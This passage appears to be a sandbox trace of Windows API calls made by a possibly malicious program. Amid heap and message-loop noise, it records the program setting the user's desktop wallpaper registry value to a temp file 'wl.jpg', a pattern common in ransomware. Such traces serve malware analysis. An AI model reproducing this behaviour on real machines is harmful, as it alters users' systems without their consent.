wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.304] Sleep (dwMilliseconds=0xa) [0289.339] timeGetTime () returned 0x11886e0 [0289.339] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.339] Sleep (dwMilliseconds=0xa) [0289.376] timeGetTime () returned 0x1188705 [0289.376] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.376] Sleep (dwMilliseconds=0xa) [0289.529] timeGetTime () returned 0x118879e [0289.529] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.529] Sleep (dwMilliseconds=0xa) [0289.598] timeGetTime () returned 0x11887e3 [0289.598] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.598] Sleep (dwMilliseconds=0xa) [0289.634] timeGetTime () returned 0x1188807 [0289.634] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.634] Sleep (dwMilliseconds=0xa) [0289.677] timeGetTime () returned 0x1188833 [0289.677] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.677] Sleep (dwMilliseconds=0xa) [0289.714] timeGetTime () returned 0x1188857 [0289.714] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0289.714] TranslateMessage (lpMsg=0x8cf798) returned 0 [0289.714] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0289.714] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0289.714] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0289.715] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.715] Sleep (dwMilliseconds=0xa) [0289.753] timeGetTime () returned 0x118887e [0289.753] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.753] Sleep (dwMilliseconds=0xa) [0289.791] timeGetTime () returned 0x11888a4 [0289.791] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.791] Sleep (dwMilliseconds=0xa) [0289.847] timeGetTime () returned 0x11888dc [0289.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0289.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0289.847] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0289.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0289.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0289.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0289.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0289.848] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0289.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0289.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0289.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0289.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0289.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0289.849] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0289.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0289.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0289.849] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0289.850] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0289.850] RegCloseKey (hKey=0x2d0) returned 0x0 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0289.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0289.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0289.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0289.851] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0289.851] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0289.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0289.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0289.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0289.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0289.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0289.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0289.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0289.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0289.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0289.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0289.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0289.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0289.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0289.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0289.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0289.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0289.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0289.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0289.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 